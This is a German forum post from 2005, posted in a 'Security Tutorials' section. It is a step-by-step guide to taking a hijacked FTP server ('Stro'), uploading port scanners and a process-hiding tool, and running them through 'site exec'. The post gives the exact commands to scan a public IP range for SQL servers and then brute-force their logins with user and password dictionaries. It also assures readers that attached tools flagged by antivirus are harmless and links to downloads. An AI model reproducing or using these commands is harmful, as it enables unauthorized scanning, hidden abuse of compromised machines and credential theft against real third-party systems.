vom stro zum scanstro

Dieses Thema im Forum "Security Tutorials" wurde erstellt von fissy, 13. Juni 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 13. Juni 2005
    1. Vorraussetzungen
    • einen Stro
    • die Programme
    • ne IP-Range
    2.Man nimmt den stro und uppt folgendes hoch:
    • hidden.exe
    • hidden32.exe
    • sfind100.exe, scan100.exe, scan500.exe oder scan1000.exe *
    *Anmerkung: je nach Speed des Servers (Zahl sind die threads)
    {bild-down: http://mitglied.lycos.de/naxos009/webspace/bilder/forum/proggs1.jpg}

    3. Dateien ausführen:
    Im Ordner des Stros rechtsklicken auf "Commands" -> "raw commands"
    so und jetzt startet man das scanprogram:
    site exec hidden.exe program.exe -p[port] [start ip] [endip]
    bsp:
    site exec hidden.exe scan500.exe -p 1433 211.46.2.1 211.47.1.1

    wenn folgendes kommt:
    200 EXEC command successful (TID=33).
    dann funktioniert der scan.

    Anmerkung: nicht das hidden.exe vergessen, sonst wird der Prozess nicht versteckt und kann leicht beendet werden.
    {bild-down: http://mitglied.lycos.de/naxos009/webspace/bilder/forum/command.jpg}

    4.Ergebnisse:
    scan.txt

    Jetzt sind die ergebnisse noch nicht fertig, wenn ihr sie gleich bruten wollt (bsp. hier sql), braucht ihr noch sqlck.exe, hidden32.exe,user.dic, pass.dic und natürlich eure Scanresultate, scan.txt.

    ihr startet so:

    site exec HIDDEN32.exe SQLck.exe -i scan.txt -u user.dic -p pass.dic -o results.txt

    Wenn alles fertig ist findet ihr im selben Ordner die resultate unter results.txt.


    5. Sonstiges:
    Wenn ihr die Prozesse beenden wollt, dann braucht ihr die kill.exe.
    Der Befehl dazu:

    site exec kill.exe PROGRAMNAME.exe

    die proggs im anhang haben keine viren, auch wenn es der Antivirenscanner vorgibt, es sind nur sql scanner bzw. bruter.

    Hier die Programme:
    download
    alternativer Download
     
  2. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.